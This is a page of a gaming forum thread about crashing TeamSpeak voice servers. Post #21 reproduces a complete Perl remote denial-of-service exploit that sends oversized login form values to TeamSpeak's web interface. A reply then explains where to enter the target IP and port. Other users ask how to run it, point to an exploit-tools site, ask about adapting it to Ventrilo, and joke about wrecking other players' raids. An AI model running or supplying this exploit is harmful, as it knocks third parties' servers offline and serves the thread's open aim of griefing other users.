Crash a TeamSpeak Server menu

User Tag List

Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 31
  1. #16
    miklm's Avatar Member
    Reputation
    21
    Join Date
    Mar 2007
    Posts
    178
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Also got the "starting in dos" problem it think you need firefox for it to work, am i right?


    Crash a TeamSpeak Server
  2. #17
    ball2hi's Avatar Member
    Reputation
    12
    Join Date
    Jan 2007
    Posts
    67
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    i dont get it, i made a notepad, copy and pasted it into there, then saved it in teamspeak file as Teamspeak.pl and when i start up teamspeak and join a server, nothing happens! Que pasa?

  3. #18
    Lackey's Avatar Member
    Reputation
    1
    Join Date
    Dec 2006
    Posts
    5
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    This has been patched by Teamspeak. It only works if servers are lower than "2.0.23.19" version. It was still fun to do it on a few servers that haven't been updated yet.

  4. #19
    keeperx7's Avatar Member
    Reputation
    8
    Join Date
    May 2007
    Posts
    30
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Tried it on a 2.0.20 server....didn't work.

  5. #20
    usernamegoeshere's Avatar Member
    Reputation
    1
    Join Date
    Aug 2007
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    haha this is gona kick some ass

  6. #21
    Rmxr's Avatar Member
    Reputation
    7
    Join Date
    Jun 2007
    Posts
    35
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    #!/usr/bin/perl

    # TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
    # Vendor URL: TeamSpeak
    # TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
    # TODO:
    # Edit $target value
    # Run script
    # CPU 100%, Memory up for 1.2 Gb per one attack session.
    # Greetz: str0ke & milw0rm proj

    use IO::Socket;

    $target = 'xxx.xxx.xxx.xxx';
    $port_tcp=14534;

    $buffer_ascii= 'A' x 0xc00000;
    $buffer_dig= '659090';
    $req = "username\=$buffer_ascii\&password\=$buffer_ascii\&serverport\=$buffer_dig\& subm it\=Login";
    $uagent = 'Mozilla 5.0';
    my $res;
    my $tmp;

    print "\nStarting D0S\n\n";
    my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "\n Could not connect to host\n\n";

    print $sock "POST /login.tscmd HTTP/1.1\r\n";
    print $sock "Host: ".$target."\r\n";
    print $sock "User-Agent: ".$uagent."\r\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    print $sock "Accept-Encoding: gzip,deflate\r\n";
    print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Referer: http://".$target."/slogin.html\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Content-Length: ".length($req)."\r\n\r\n";
    print $sock $req;
    print $sock "\n";

    while ( $res = <$sock> ) {
    $tmp.= $res;
    }
    print $tmp;
    close($sock);

    # milw0rm.com [2007-07-20]

    Where do you put the ip and port?

  7. #22
    Zentek's Avatar Contributor
    Reputation
    116
    Join Date
    Jul 2006
    Posts
    359
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    $target = 'xxx.xxx.xxx.xxx'; IP
    $port_tcp=14534; Port

  8. #23
    Kubiatsu's Avatar Contributor
    Reputation
    167
    Join Date
    Feb 2007
    Posts
    506
    Thanks G/R
    9/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Any tools or anything that can work on the latest TS 2 Servers?

  9. #24
    black-ops's Avatar Member
    Reputation
    1
    Join Date
    Feb 2007
    Posts
    15
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    yer you get all the teamspeak tools here:
    www.openportexploits.org

  10. #25
    X-Gogeta's Avatar Active Member
    Reputation
    18
    Join Date
    Dec 2006
    Posts
    392
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Wtf, so many stupid questions :s. Come on people, its pretty much common sense.
    --

    *sigh* 100 kb max file size :/.

  11. #26
    hollyw00d's Avatar Member
    Reputation
    5
    Join Date
    Jun 2007
    Posts
    110
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    this work for vent servers too perhaps? I know a lot of people use TS servers but every guild I've been a part of uses Vent. I know there was a vent version of this a LONG time ago (perhaps soem dif code?) but it basically overflowed the server until it lagged everyone out and it crashed. Anyone try this for ventrillo servers?

  12. #27
    makichi's Avatar Private
    Reputation
    1
    Join Date
    Mar 2014
    Posts
    2
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Sorry to "wake" this thread but...can anyone update this ? much appreciated

  13. #28
    Phygar's Avatar ( ͡° ͜ʖ ͡°)
    Reputation
    443
    Join Date
    Nov 2007
    Posts
    1,591
    Thanks G/R
    7/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by makichi View Post
    Sorry to "wake" this thread but...can anyone update this ? much appreciated

    no

  14. #29
    Dovah's Avatar Legendary The Explorer

    Reputation
    740
    Join Date
    Feb 2014
    Posts
    574
    Thanks G/R
    381/202
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by makichi View Post
    Sorry to "wake" this thread but...can anyone update this ? much appreciated
    i dont think people even use teamspeak anymore


    I rarely check Ownedcore nowadays. Need to contact me? Message me on Discord: dovvah

  15. #30
    dweezee20's Avatar Private
    Reputation
    1
    Join Date
    Apr 2014
    Posts
    13
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This would ruin someones raid to the point where they smash their keyboard xDD

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. Replies: 6
    Last Post: 01-03-2008, 02:14 AM
  2. Crashing a WoW-Server- Would These Methods Work?
    By mafiaboy in forum World of Warcraft Emulator Servers
    Replies: 20
    Last Post: 12-31-2007, 07:17 AM
  3. how to shutdown a teamspeak server with no admin rights
    By blargz in forum World of Warcraft Exploits
    Replies: 12
    Last Post: 11-20-2007, 04:07 PM
  4. a Teamspeak server
    By ~Jagris in forum Community Chat
    Replies: 8
    Last Post: 06-29-2007, 09:58 PM
  5. WoWGlider Teamspeak Server
    By Cypher in forum World of Warcraft Bots and Programs
    Replies: 11
    Last Post: 01-07-2007, 08:36 PM
All times are GMT -5. The time now is 10:58 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search